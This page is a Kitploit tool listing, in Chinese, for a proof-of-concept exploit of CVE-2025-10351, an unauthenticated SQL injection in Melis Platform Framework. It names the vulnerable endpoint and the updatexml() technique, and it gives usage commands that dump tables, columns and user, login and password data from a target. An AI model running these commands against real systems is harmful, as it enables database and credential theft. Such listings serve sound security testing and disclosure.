Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-10351-POC — CVE-2025-10351 的漏洞利用。Melis Platform Framework 上的 SQL 注入。 | Kitploit
工具/GitHubGitHub/ivansmc/cve-2025-10351-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubivansmc/cve-2025-10351-poc

CVE-2025-10351-POC

CVE-2025-10351 的漏洞利用。Melis Platform Framework 上的 SQL 注入。

查看仓库
126个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-10351 POC - SQL 注入利用程序 💉

针对 CVE-2025-10351 的 POC:一个影响 Melis Platform Framework 中特定端点的未认证 SQL 注入漏洞。

status python status


🔗 参考资料

  • 📄 MITRE 上的 CVE-2025-10351
  • 📄 INCIBE(西班牙国家网络安全研究所)关于 Melis Platform 的警告

🚀 描述

此 POC 针对以下端点中的未认证基于错误的 SQL 注入漏洞:

root@kitploit:~
melis/MelisCms/PageEdition/getTinyTemplates?idPage=

它利用 MySQL 中的 updatexml() 来提取:

  • 表名
  • 列名
  • 特定列或所有列中的数据

它还会检测可能的基于时间的 SQLi 向量,以便进一步手动利用。


🛠️ 环境要求

使用以下命令安装依赖:

root@kitploit:~
pip3 install -r requirements.txt

🧪 使用方法

基本检查

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80

从 URL 列表

root@kitploit:~
python3 CVE-2025-10351-POC.py -l targets.txt

提取所有表名

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at

从表中提取所有列名

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users

提取所有列中的所有数据

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac

提取特定列

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password

使用带有不安全模式、Cookie 和调试模式的代理

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug

⚙️ 选项

参数描述
-u目标 URL
-p端口(80、443 等)
-l包含 URL 列表的文件
-s基于时间测试的休眠时间(默认:1 秒)
-at导出所有表名
-t指定表名
-ac导出指定表的所有列
-c要导出的列列表,以逗号分隔
--proxyBurp 代理 http://127.0.0.1:8080
--insecure使用代理连接时禁用 TLS 检查
--cookie用于认证请求的 Cookie
--debug调试模式

📤 输出

  • 提取的表保存到 tables_extracted.txt
  • 提取的数据保存到 <table_name>_data.txt

⚠️ 免责声明

本文档仅用于授权安全测试和修复。请不要对你不拥有或未经明确许可测试的系统使用此 PoC 或复现步骤。作者对滥用行为不承担任何责任。


由 Manuel Iván San Martín Castillo 用 ❤️ 制作

下载工具